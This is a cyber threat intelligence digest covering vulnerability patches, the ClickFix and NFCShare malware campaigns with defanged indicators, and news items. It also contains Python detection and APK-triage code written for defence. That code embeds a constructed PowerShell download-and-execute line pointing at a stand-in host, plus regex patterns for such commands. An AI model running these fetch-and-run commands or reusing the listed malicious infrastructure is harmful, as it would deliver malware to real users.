Executive Summary -
Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
IBM Patches CVE-2026-7870 Affecting IBM i Operating System - On 9th June 2026, IBM patched CVE-2026-7870, a high-severity uncontrolled search path element vulnerability affecting IBM i operating system versions 7.3, 7.4, 7.5, and 7.6. The flaw stems from an unqualified library call within the operating system, which could allow a threat actor to execute user-controlled code with administrator privileges.
At the time of writing, no active exploitation of CVE-2026-7870 has been reported. Organisations running the affected IBM i versions are advised to apply the available patch promptly to mitigate the risk of privilege escalation.
Apache Patches CVE-2026-50623 Affecting Apache CXF - On 12th June 2026, Apache patched and disclosed CVE-2026-50623, a high-severity improper input validation vulnerability affecting Apache CXF 4.2.x releases prior to 4.2.2 (that is, 4.2.0 and 4.2.1) and 4.1.x releases prior to 4.1.7. Successful exploitation of this flaw would allow a threat actor to execute arbitrary code on affected systems.
Apache addressed the vulnerability in versions 4.2.2 and 4.1.7, and organisations running earlier releases are advised to upgrade promptly. At the time of writing, there are no known instances of active exploitation in the wild.
Canon Patches Five EOS Network Setting Tool Vulnerabilities (CVE-2026-9258, CVE-2026-9259, CVE-2026-9260, CVE-2026-9261, CVE-2026-9262) - On 15th June 2026, Canon patched five vulnerabilities - CVE-2026-9258, CVE-2026-9259, CVE-2026-9260, CVE-2026-9261, and CVE-2026-9262 - affecting its EOS Network Setting Tool version 1.5.0 and earlier, available on both Windows and macOS, and bundled within EOS Utility versions 3.12.0 through 3.20.20.
Canon addressed the vulnerabilities with the release of EOS Network Setting Tool version 1.5.1, included in EOS Utility version 3.20.21 or later, and users running affected versions are advised to update accordingly.
Potential Threats
Threat Actors Distribute NFCShare Through Bank-Themed Phishing Websites and GitHub-Hosted Android APKs to Facilitate NFC Payment Card Fraud - On 8th June 2026, cybersecurity firm D3Lab published a technical analysis detailing the evolution of the NFCShare Android fraud campaign. NFCShare is an Android malware family that harvests payment card data via Near Field Communication (NFC) and collects associated PINs from victims. The campaign utilises GitHub-hosted APKs, frequent rebuilds, and anti-analysis techniques, whilst impersonating Italian and European banking organisations including Intesa Sanpaolo, Banca Sella, Fideuram, Nexi, Mooney, BCC Roma, Klirway, and CaixaBank.
The infection chain begins when victims visit phishing sites impersonating banking institutions, where they are prompted to download a malicious APK disguised as a legitimate banking application update. Once installed, NFCShare instructs victims to place a payment card near the device, extracts card details via NFC using the EMV SELECT command, and prompts for a PIN before exfiltrating all collected data to threat actor-controlled infrastructure. D3Lab identified consistent family markers across samples, including the nfc.share.itnamteis namespace, MqttChannel messaging framework, and NPStringFog string obfuscation, with newer samples introducing malformed ZIP paths to hinder automated analysis.
ClickFix Campaign Abuses Google Sites to Deliver Information Stealer Payload - On 3rd June 2026, ANY.RUN published a report detailing a ClickFix campaign impersonating popular AI tools, including Codex and Claude, to deliver an information stealer payload. The campaign directed victims to fake installation pages hosted on sites[.]google[.]com, with both observed URLs returning error messages at the time of writing.
The pages prompted victims to open PowerShell and execute a malicious mshta command, which initiated a multi-stage delivery process. This extracted a steganographic payload from an image, deployed shellcode, and executed the information stealer in memory within powershell.exe, subsequently exfiltrating browser credentials, email data, and cryptocurrency wallet information to threat actor-controlled command-and-control infrastructure.
Threat Actors Abuse Fake Amazon Security Alerts to Deliver HarborWatch Agent Through ClickFix - On 8th June 2026, Cofense published a report detailing an Amazon-themed phishing campaign abusing the ClickFix self-infection technique to deliver HarborWatch Agent, a custom remote access trojan (RAT) that collects host information, checks in with command-and-control (C2) infrastructure, retrieves tasks, and supports threat actor monitoring via a web interface. Threat actors distribute a phishing email with the subject "Security alert: Login activity anomaly notification", creating urgency through fake account details and a lookalike sender address, with an embedded button redirecting victims to amazonattention[.]com/verify, which remained active at the time of writing.
The landing page presents a fake CAPTCHA-style check that instructs victims to press Windows Key + R and paste clipboard content, which silently executes a hidden PowerShell command decoding a Base64 string that retrieves and runs a remote script from hxxps://amazonalert[.]xyz/download/code[.]txt. This script downloads HarborWatch Agent, disguised as mysql.exe, from hxxps://zoomupdate[.]b-cdn[.]net/mysql[.]exe and executes it with a hardcoded password argument, likely as an anti-analysis control. Once active, the RAT establishes a connection to hxxp://185[.]193[.]127[.]44, collects detailed system information, and communicates via dedicated API endpoints for task retrieval and heartbeat traffic. Cofense also identified an administrator panel on the same IP featuring Chinese-language branding translated as "Harbor Sentinel", advertising asset monitoring and real-time status updates consistent with the RAT's observed behaviour.
General News
University of Nottingham confirms cyber incident as ShinyHunters group claims data theft - The University of Nottingham confirmed a cyber incident in which a significant amount of data belonging to current and former students was accessed by an external third party. The university stated it is still working to understand the full scope of the breach and has already directly contacted affected individuals, potentially including those at its campuses in Malaysia and China as well as in Nottingham. The incident has been claimed by the ShinyHunters cybercrime group, which alleged on its extortion site to have obtained over 40GB of material including credit card and payment details.
Analysis by Have I Been Pwned of the group's partially published data indicates it includes approximately 455,000 unique email addresses alongside extensive personal information such as names, addresses, phone numbers, ethnicities, disabilities, passport numbers, and data relating to academic enrolments and fee payments. The university confirmed it is working with a third party on a forensic investigation to verify the exact scope of the data accessed and has stated it will provide further updates as the investigation progresses. It is worth noting that ShinyHunters has a history of misrepresenting its access in extortion attempts, including the use of historical or publicly available datasets presented as internal system breaches.
Anthropic says US government forced it to disable cybersecurity AI models - Anthropic disabled two of its most advanced cybersecurity-focused AI models, Fable 5 and Mythos 5, following an export control directive issued by the US government barring any foreign national from accessing them, including Anthropic's own employees. The directive cited national security authorities and appears to represent the first instance of such powers being used to curtail the export of AI models rather than chips or hardware. Anthropic stated its understanding is that the government believed a jailbreaking method for Fable 5 had been identified, though only verbal evidence was provided, and concluded upon review that the vulnerabilities were minor, previously known, and reproducible using other publicly available models.
Whilst complying, Anthropic publicly disputed the directive's basis, warning that applying such a standard across the industry would effectively halt all new frontier model deployments. The action arrived two days after chief executive Dario Amodei published a policy essay calling for government authority to block unsafe AI deployments — a position the company maintained, whilst insisting such authority should operate through a transparent and technically grounded statutory process. The directive also comes amid broader tensions with the Trump administration, following Defence Secretary Pete Hegseth's designation of Anthropic as a "supply chain risk" in February after contract negotiations over military use of Claude broke down. Anthropic apologised for the disruption and stated it is working to restore access as soon as possible.
UK to ban social media access for children under 16 - British Prime Minister Keir Starmer has announced plans to ban under-16s from using social media platforms including TikTok, Facebook, Instagram, Snapchat, X, and YouTube, whilst messaging services such as WhatsApp will be exempt. The government intends to introduce legislation before Christmas, with enforcement expected by spring 2027. The ban will be modelled on a similar measure introduced in Australia last December but will go further, including additional restrictions on harmful functions such as livestreaming and stranger communication for under-16s, extending to gaming sites. AI romantic companion chatbots and intimate functionalities on all other chatbots will be restricted for under-18s.
The UK's communications regulator has been tasked with designing robust age assurance measures, with further announcements expected next month including possible overnight curfews and mandatory breaks in infinite scrolling for under-18s. However, the policy faces scrutiny on several fronts. Evidence from Australia suggests blanket bans have limited effectiveness, with nearly a third of children retaining social media accounts after the ban took effect, largely because platforms failed to enforce age verification. Critics including Amnesty International UK have argued the approach targets children rather than the platforms themselves, which they contend are unsafe by design. Political analysts have also noted that Starmer's current vulnerability could complicate the government's ability to see the legislation through to enactment.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and together determine the group's severity rating. This week's updates can be seen below.

Severity bands: Limited, Basic, Moderate, High.

| Threat Actor | Severity (previous → current) | Opportunity (previous → current) | Intent (previous → current) |
|---|---|---|---|
| APT32 OceanLotus | NEW → Moderate | NEW → 55 | NEW → 30 |
| ShinyHunters | Moderate → Moderate | 49 → 49 | 60 → 61 |
| Frekinoi | NEW → Basic | NEW → 30 | NEW → 30 |
| UNC6240 | NEW → Basic | NEW → 25 | NEW → 25 |
| l1ghtSoulHem | NEW → Basic | NEW → 25 | NEW → 25 |
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is marked with a symbol indicating how actively it is trending.
The spikes in references are calculated over 60 days and are normalised to ensure they aren't disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
| Attackers | Methods | Vulnerabilities | Targets |
|---|---|---|---|
| Chinese Hackers ▲ | Redcap ▲ | CVE-2026-20262 ▲ | Medical Devices Manufacturer ▲ |
| Space Bears Ransomware Group ▲ | Nova Ransomware ▲ | CVE-2026-54420 ▲ | iRhythm Technologies ▲ |
| Shadowbyt3 ▲ | INFINITERED ▲ | CVE-2026-42824 ▲ | Healthcare ▲ |
| UNC6508 ▲ | Cryptolocker ▲ | CVE-2026-35273 ▲ | iRhythm Holdings ▲ |
| North Korean Hackers ▲ | GammaDrop ▲ | CVE-2026-0257 ▲ | Nintendo ▲ |
Prominent Information Security Events
ClickFix Campaign Abuses Google Sites to Deliver Information Stealer Payload
Source: Insikt Group | Validated Intelligence Event
IOC: URL - hxxps://primemetricsa[.]com/1518925
IOC: Domain - swiftmatrix15[.]com
On 3rd June 2026, ANY.RUN published a report detailing a ClickFix campaign impersonating popular AI tools, including Codex and Claude, to deliver an information stealer payload. ClickFix is a social engineering technique that presents victims with fake error or verification pages designed to trick them into manually executing malicious commands. In this campaign, threat actors directed victims to fraudulent installation pages hosted on sites[.]google[.]com, with observed URLs including hxxps://sites[.]google[.]com/view/cdx-biz-ver-24 and hxxps://sites[.]google[.]com/view/clau-ver-un-24, both of which returned error messages at the time of writing.
The fraudulent pages displayed ClickFix-style instructions prompting victims to open PowerShell and execute a malicious mshta command - specifically hxxps://primemetricsa[.]com/1627115 for the fake Codex page and hxxps://primemetricsa[.]com/1518925 for the fake Claude page, both returning error messages at the time of writing. Once executed, mshta initiated a multi-stage PowerShell delivery process that extracted a steganographic payload concealed within an image file, deployed shellcode, and executed the information stealer directly in memory within powershell.exe, thereby avoiding the creation of files on disk and hindering detection.
Once active, the information stealer harvested browser credentials, email data, and cryptocurrency wallet information before exfiltrating the collected data to threat actor-controlled command-and-control infrastructure. The use of legitimate Google Sites infrastructure for initial redirection, combined with in-memory payload execution and steganographic delivery, reflects a deliberate effort to evade both endpoint defences and network-based detection controls. The campaign highlights the continued abuse of trusted platforms and AI brand impersonation as effective lures within the ClickFix technique.
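The ClickFix chains described here and in the Amazon-themed HarborWatch campaign above share one pattern on the endpoint: a user-typed mshta or PowerShell command that fetches a remote stage, frequently wrapped in -EncodedCommand with a hidden window. The following is an added example written for this digest (not code from ANY.RUN, Cofense or the campaigns) that scores process-creation command lines against those indicators, decoding the Base64 UTF-16LE payload so that a download-and-invoke stage is caught even when it is encoded. The sample events are constructed, and the hosts use reserved .invalid names in place of the live domains named in the reports:

```python
"""Triage of process-creation command lines for ClickFix execution chains.

Added example for this digest, not tooling from the ANY.RUN or Cofense
reports. The sample events below are constructed; the hosts use reserved
.invalid names rather than the live domains named in the reports.
"""
import base64
import re

URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# the argument is Base64 of a UTF-16LE script.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                    re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                         r"invoke-restmethod|\birm\b|start-bitstransfer", re.IGNORECASE)
INVOKE_RE = re.compile(r"\biex\b|invoke-expression", re.IGNORECASE)
MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext script behind -EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(cmdline):
    """Score one command line. Indicators are checked against the raw line
    and, where present, the decoded -EncodedCommand payload, so a hidden
    download-and-invoke stage is not missed just because it is encoded."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    indicators = []
    if MSHTA_RE.search(cmdline) and URL_RE.search(cmdline):
        indicators.append("mshta_remote_url")        # AI-tool lure: mshta <url>
    if decoded is not None:
        indicators.append("encoded_command")         # Amazon lure: Win+R paste
    if HIDDEN_RE.search(text):
        indicators.append("hidden_window")
    if DOWNLOAD_RE.search(text) and INVOKE_RE.search(text):
        indicators.append("download_and_invoke")     # fetch remote script, run in memory
    return {"decoded": decoded, "urls": URL_RE.findall(text),
            "indicators": indicators, "score": len(indicators)}


# Constructed stage-1 script of the kind the fake CAPTCHA plants on the clipboard.
STAGE1_SCRIPT = ("iex (iwr 'https://amazonalert.example.invalid/download/code.txt'"
                 " -UseBasicParsing).Content")

SAMPLE_EVENTS = [
    # 1) what Win+R executes after the paste: hidden window, encoded script
    "powershell.exe -w hidden -enc "
    + base64.b64encode(STAGE1_SCRIPT.encode("utf-16-le")).decode("ascii"),
    # 2) the AI-tool lure's one-liner: mshta pulling a remote HTA
    "mshta https://primemetricsa.example.invalid/1518925",
    # 3) routine admin use of PowerShell, which should not fire
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
]


def flagged_events(events, threshold=1):
    """Return (event, indicators) for every event reaching the threshold."""
    out = []
    for event in events:
        result = analyse(event)
        if result["score"] >= threshold:
            out.append((event, result["indicators"]))
    return out


if __name__ == "__main__":
    for event, hits in flagged_events(SAMPLE_EVENTS):
        print(hits, "<-", event[:60])
```

The input is assumed to be command-line telemetry of the kind Sysmon Event ID 1 or an EDR process-creation event provides. The regexes are deliberately loose heuristics: on a real fleet, weight `mshta_remote_url` and `encoded_command` with a parent process of explorer.exe (the Run dialog) far higher than the same strings under a known management agent.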
Threat Actors Distribute NFCShare Through Bank-Themed Phishing Websites and GitHub-Hosted Android APKs to Facilitate NFC Payment Card Fraud
Source: Insikt Group | Validated Intelligence Event
IOC: URL: hxxps://github[.]com/antoniocastaldo1998/app-scuola
IOC: Hash: 090a30252991830596c75a945885ca3100d7a40edf4a16d78abd5bbfd90ba268
On 8th June 2026, cybersecurity firm D3Lab published a technical analysis detailing the evolution of the NFCShare Android fraud campaign. NFCShare is an Android malware family that harvests payment card data via Near Field Communication (NFC) and collects associated PINs from victims. The campaign is characterised by the use of GitHub-hosted APKs, frequent rebuilds, and anti-analysis techniques, and has been observed impersonating a range of Italian and European banking organisations including Intesa Sanpaolo, Banca Sella, Fideuram, Nexi, Mooney, BCC Roma, Klirway, and CaixaBank.
The infection chain begins when victims visit phishing sites impersonating legitimate banking institutions, where they are prompted to download a malicious APK disguised as a banking application update. Threat actors may supplement this with SMS messages or phone calls from individuals posing as bank representatives, guiding victims through enabling Android's "install from unknown sources" setting and sideloading the application. Once installed, NFCShare loads a phishing interface within a WebView and instructs victims to place a payment card near the device. The malware then uses Android's IsoDep interface to communicate with the card over NFC, issuing the EMV SELECT command to extract the card number, type, label, and expiration date. Victims are subsequently prompted to enter their PIN, after which all collected data is serialised and exfiltrated to threat actor-controlled infrastructure at ws://nfck[.]loseyourip[.]com:8001/.
D3Lab identified a number of consistent family markers across the GitHub-hosted samples, including the nfc.share.itnamteis namespace, the MqttChannel messaging framework, and NPStringFog string obfuscation utilising the hard-coded key "itnewpag". Newer samples also introduce malformed ZIP paths under locations such as /AndroidManifest.xml/, /classes.dex/, and /resources.arsc/, which are designed to disrupt automated extraction workflows and complicate static analysis efforts. These evasion refinements, combined with the campaign's ongoing infrastructure and lure diversification, suggest an actively maintained and evolving threat.
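The malformed-path trick is cheap to check for before an APK ever reaches a decompiler: an entry named /classes.dex/ looks like a directory to many extractors but still carries data, while the genuine classes.dex sits alongside it. The following added example (not D3Lab's tooling) builds a constructed in-memory APK with those shadow entries and the family strings named above, and triages it with the standard-library zipfile module without extracting the bogus entries:

```python
"""Static triage of an APK for the NFCShare family markers described by D3Lab.

Added example, not D3Lab's tooling. The APK is built in memory with
constructed contents; it is not a real sample.
"""
import io
import zipfile

CORE_MEMBERS = ("AndroidManifest.xml", "classes.dex", "resources.arsc")
# Family markers named in the report: namespace, messaging class,
# string-obfuscation helper and its hard-coded key.
FAMILY_MARKERS = (b"nfc.share.itnamteis", b"nfc/share/itnamteis",
                  b"MqttChannel", b"NPStringFog", b"itnewpag")


def triage_apk(apk_bytes):
    """Return shadow entries that collapse to a core member name, directory
    entries that carry data, the family strings found, and a verdict."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        infos = zf.infolist()
        names = [i.filename for i in infos]
        # "/classes.dex/" and friends: look like a directory, normalise to a core file
        shadowed = sorted(n for n in names
                          if n not in CORE_MEMBERS and n.strip("/") in CORE_MEMBERS)
        dir_with_data = sorted(i.filename for i in infos if i.is_dir() and i.file_size > 0)
        markers = set()
        for info in infos:
            if info.is_dir():
                continue                       # never extract the bogus entries
            blob = zf.read(info)
            markers.update(m.decode() for m in FAMILY_MARKERS if m in blob)
    if len(markers) >= 2:
        verdict = "likely NFCShare"
    elif shadowed or dir_with_data:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"shadowed_entries": shadowed, "directory_entries_with_data": dir_with_data,
            "family_markers": sorted(markers), "verdict": verdict}


def build_sample_apk(evasive, family_strings):
    """Construct a minimal APK-like zip. `evasive` adds the malformed
    directory-style duplicates of the core members; `family_strings`
    embeds the NFCShare markers in the manifest and dex."""
    pkg = b"nfc.share.itnamteis" if family_strings else b"com.example.app"
    dex_body = (b"Lnfc/share/itnamteis/MqttChannel;NPStringFog;itnewpag"
                if family_strings else b"Lcom/example/app/MainActivity;")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b'<manifest package="' + pkg + b'"/>')
        zf.writestr("classes.dex", b"dex\n035\x00" + dex_body)
        zf.writestr("resources.arsc", b"\x02\x00\x0c\x00")
        if evasive:
            for core in CORE_MEMBERS:
                zf.writestr("/" + core + "/", b"not a directory")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_apk(build_sample_apk(evasive=True, family_strings=True)))
```

The verdict thresholds are assumptions for illustration; in practice the structural check (a directory-named entry with a non-zero size, or any entry whose stripped name equals a core member) is the reliable signal, since the family strings can be renamed in the next rebuild.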
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2026-7870 (IBM) – Apply IBM's fix for the affected IBM i releases (7.3, 7.4, 7.5 and 7.6).
- CVE-2026-50623 (Apache CXF) – Upgrade to version 4.2.2 on the 4.2 branch, or to 4.1.7 on the 4.1 branch.
- CVE-2026-9258, CVE-2026-9259, CVE-2026-9260, CVE-2026-9261, CVE-2026-9262 (Canon) – Update to EOS Utility 3.20.21 or later, which includes EOS Network Setting Tool 1.5.1, to remediate these vulnerabilities.
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.